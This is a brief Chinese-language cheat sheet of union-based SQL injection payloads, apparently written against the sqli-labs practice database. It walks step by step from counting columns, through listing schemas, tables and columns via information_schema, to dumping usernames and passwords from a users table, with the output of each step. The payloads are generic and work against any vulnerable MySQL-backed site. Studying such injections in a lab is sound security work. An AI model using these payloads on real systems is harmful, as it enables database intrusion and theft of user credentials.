1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| 猜解字段数 order by 3%23 union select 1,2,3%23 获取当前数据库名 union select 1,(select database()) ,3%23 security 获取所有数据库名 union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23 information_schema,challenges,mysql,performance_schema,security 获取表名 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)%23 emails,referers,uagents,users 获取列名 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)%23 id,username,password 获取数据 union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23 获取数据库版本 union select 1,@@version,database()%23
|